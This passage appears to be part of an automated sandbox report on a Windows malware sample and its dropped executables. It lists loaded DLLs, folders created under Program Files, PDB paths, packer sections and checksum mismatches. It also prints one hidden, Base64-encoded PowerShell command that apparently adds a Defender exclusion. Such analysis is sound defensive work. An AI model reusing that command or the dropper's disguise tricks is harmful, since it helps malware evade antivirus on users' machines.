                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: amsi.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: userenv.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: amsi.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: userenv.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Google\Chrome\Extensions
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: cMTqzvmx9u.exe Static file information: File size 3238912 > 1048576
                    Source: cMTqzvmx9u.exe Static PE information: Raw size of qbaikvfg is bigger than: 0x100000 < 0x2aac00
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: .pdbyy: source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: ba944ca4ff.exe, 0000000F.00000000.2277534376.0000000000F2C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe Unpacked PE file: 0.2.cMTqzvmx9u.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Unpacked PE file: 9.2.7620ab885d.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W;ibdqnddj:EW;izikvcoa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ibdqnddj:EW;izikvcoa:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe Unpacked PE file: 10.2.8469cb4d4d.exe.740000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe Unpacked PE file: 27.2.b285303eae.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aseoxclk:EW;dunhoeap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aseoxclk:EW;dunhoeap:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Unpacked PE file: 46.2.96e283ac77.exe.350000.0.unpack :EW;.rsrc:W;.idata :W;rqcwpexm:EW;viefdblt:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: DJj.exe.11.dr Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                    Source: random[1].exe1.5.dr Static PE information: real checksum: 0x2d1643 should be: 0x2db872
                    Source: e6e4c20fad.exe.5.dr Static PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: DJj.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x4d466
                    Source: graph.exe.24.dr Static PE information: real checksum: 0x0 should be: 0x46f82
                    Source: cMTqzvmx9u.exe Static PE information: real checksum: 0x31ccf6 should be: 0x31ec04
                    Source: random[2].exe0.5.dr Static PE information: real checksum: 0x0 should be: 0x88ff0
                    Source: f53b3c5fe2.exe.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: b9ba85c997.exe.5.dr Static PE information: real checksum: 0x1e4847 should be: 0x1dfc35
                    Source: 7620ab885d.exe.5.dr Static PE information: real checksum: 0x2d1643 should be: 0x2db872
                    Source: random[3].exe2.5.dr Static PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: random[3].exe0.5.dr Static PE information: real checksum: 0x1e4847 should be: 0x1dfc35
                    Source: 8469cb4d4d.exe.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: random[2].exe1.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: skotes.exe.0.dr Static PE information: real checksum: 0x31ccf6 should be: 0x31ec04
                    Source: 68f6adf5d5.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: random[1].exe.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
                    Source: random[4].exe0.5.dr Static PE information: real checksum: 0x1e3012 should be: 0x1e6e5f
                    Source: aa8c9de034.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
                    Source: b285303eae.exe.5.dr Static PE information: real checksum: 0x1d5977 should be: 0x1d1f8d
                    Source: random[1].exe2.5.dr Static PE information: real checksum: 0x1d5977 should be: 0x1d1f8d
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr Static PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: 7ddd2a748c.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x88ff0
                    Source: 24da220eed.exe.5.dr Static PE information: real checksum: 0x1e3012 should be: 0x1e6e5f
                    Source: random[3].exe.5.dr Static PE information: real checksum: 0x44e278 should be: 0x44f8e8
                    Source: random[2].exe2.5.dr Static PE information: real checksum: 0x4fae65 should be: 0x5026b7
                    Source: random[1].exe0.5.dr Static PE information: real checksum: 0x0 should be: 0x2fb3e7
                    Source: 96e283ac77.exe.5.dr Static PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: 6b06c8a266.exe.5.dr Static PE information: real checksum: 0x44e278 should be: 0x44f8e8
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr Static PE information: real checksum: 0x2b2306 should be: 0x2bd36c
                    Source: 0a7e8af92e.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x2fb3e7
                    Source: cMTqzvmx9u.exe Static PE information: section name:
                    Source: cMTqzvmx9u.exe Static PE information: section name: .idata
                    Source: cMTqzvmx9u.exe Static PE information: section name: qbaikvfg
                    Source: cMTqzvmx9u.exe Static PE information: section name: scclittj
                    Source: cMTqzvmx9u.exe Static PE information: section name: .taggant
                    Source: skotes.exe.0.dr Static PE information: section name:
                    Source: skotes.exe.0.dr Static PE information: section name: .idata
                    Source: skotes.exe.0.dr Static PE information: section name: qbaikvfg
                    Source: skotes.exe.0.dr Static PE information: section name: scclittj
                    Source: skotes.exe.0.dr Static PE information: section name: .taggant
                    Source: 7620ab885d.exe.5.dr Static PE information: section name:
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: .rsrc
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: .idata
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: ibdqnddj
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: izikvcoa
                    Source: 7620ab885d.exe.5.dr Static PE information: section name: .taggant
                    Source: random[3].exe.5.dr Static PE information: section name:
                    Source: random[3].exe.5.dr Static PE information: section name: .idata
                    Source: random[3].exe.5.dr Static PE information: section name:
                    Source: random[3].exe.5.dr Static PE information: section name: xyfieepk
                    Source: random[3].exe.5.dr Static PE information: section name: lpcplxjb
                    Source: random[3].exe.5.dr Static PE information: section name: .taggant
                    Source: random[1].exe.5.dr Static PE information: section name:
                    Source: random[1].exe.5.dr Static PE information: section name: .idata
